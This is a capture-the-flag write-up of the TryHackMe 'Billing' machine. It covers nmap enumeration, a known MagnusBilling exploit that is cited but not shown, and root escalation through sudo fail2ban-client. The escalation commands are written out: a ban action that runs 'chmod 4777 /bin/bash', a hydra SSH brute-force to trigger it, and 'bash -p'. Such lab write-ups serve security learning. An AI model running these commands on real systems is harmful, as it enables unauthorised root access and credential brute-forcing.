Billing (THM)

Some mistakes can be costly.

Intro

Welcome everyone today we have a fresh try hack me machine let's jump right into it.

Enumeration.

Port scanning.

22/tcp   open  ssh      syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCukT/TLi8Po4V6OZVI6yhgSlTaANGLErWG2Hqz9UOxX3XXMFvRe0uivnYlcvBwvSe09IcHjC6qczRgRjdqQOxF2XHUIFBgPjNOR3mb1kfWg5jKAGun6+J9atS8z+5d6CZuv0YWH6jGJTQ1YS9vGNuFvE3coJKSBYtNbpJgBApX67tCQ4YKenrG/AQddi3zZz3mMHN6QldivMC+NCFp+PozjjoJgD4WULCElDwW4IgWjq64bL3Y/+Ii/PnPfLufZwaJNy67TjKv1KKzW0ag2UxqgTjc85feWAxvdWKVoX5FIhCrYwi6Q23BpTDqLSXoJ3irVCdVAqHfyqR72emcEgoWaxseXn2R68SptxxrUcpoMYUXtO1/0MZszBJ5tv3FBfY3NmCeGNwA98JXnJEb+3A1FU/LLN+Ah/Rl40NhrYGRqJcvz/UPreE73G/wjY8LAUnvamR/ybAPDkO+OP47OjPnQwwbmAW6g6BInnx9Ls5XBwULmn0ubMPi6dNWtQDZ0/U=
|   256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBVI/7v4DHnwY/FkhLBQ71076mt5xG/9agRtb+vldezX9vOC2UgKnU6N+ySrhLEx2snCFNJGG0dukytLDxxKIcw=
|   256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII6ogE6DWtLYKAJo+wx+orTODOdYM23iJgDGE2l79ZBN
80/tcp   open  http     syn-ack Apache httpd 2.4.56 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.56 (Debian)
| http-title:             MagnusBilling        
|_Requested resource was http://billing.thm/mbilling/
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
3306/tcp open  mysql    syn-ack MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open  asterisk syn-ack Asterisk Call Manager 2.10.6

There are few interesting services running we see mysql and asterisk.

asterisk is a services that help you to manage the Voice Over IP communication.

First let's check the website.

Here we have simple login page. Tried some default creds but nothing works, after some more enumeration i decided to check the name that shows in the nmap scan and look it up. MagnusBilling then i found this.

GitHub - magnussolution/magnusbilling7: MagnusBilling is a fast, secure, efficient, high availability, VOIP Billing.GitHub

Shell as asterisk

So MagnusBilling is a helper for the asterisk and it has the GUI we seen just now the login. Search on know exploits we can find one.

Rapid7Rapid7

I tested that and it actual works.

Shell as root.

So after i got into the machine i check the sudo premissions and found this.

Fail2ban-client is a command-line tool that helps in managing the Fail2ban service. Fail2ban is a security tool that protects your server from potential threats like brute-force attacks by monitoring the log files for specific patterns (typically failed login attempts) and taking action, such as temporarily banning the offending IP addresses.

With the fail2ban-client, you can interact with the Fail2ban service to perform actions such as starting or stopping jails, viewing or updating settings, and checking the status of different jails on your server. Essentially, it helps you control how your server responds to suspicious activities to keep it secure.

i have tested this but i do now find anything at first i check some files there was some sql creds we can find it here.

And also nothing was there. I also found a CPUS running i tried and test it but also nothing were there.

Until i read more about the fail2ban-client tool so how it work is that we can set custom command to run upon some conditions. For example if some user brute-force our ssh service we can set a custom rule or script to run when it detect brute-forcing.

To set up these rule and get root shell we can do as follows.

sudo fail2ban-client set sshd addaction pwned 

So this command basiclly tells fail2ban to set role or action on the sshd demon called pwned.

sudo fail2ban-client set sshd action pwned actionban "/bin/bash -c 'chmod 4777 /bin/bash'"

and this command here allow for us to set pwned action as we want and as we can see here we adding suid bit to the bash file which will allow us to execute bash with premissions of its owner which is root. To trigger this action we can simple bruteforce the ssh service using hydra.

hydra -l magnus -P ../../Downloads/rockyou.txt billing.thm ssh -t 50

With that we wait for few seconds and check the permissions of the bash.

But wait if we just run bash now we gonna get same as our user right ?.

Yeah that actually a Linux thing which drop the permissions of security reasons to avoid that we can just add -p to the command.

Conclusion.

In the end this machine was simple and fun i have learned about fail2ban which a completely new tool on me so we can get out the machine with something new.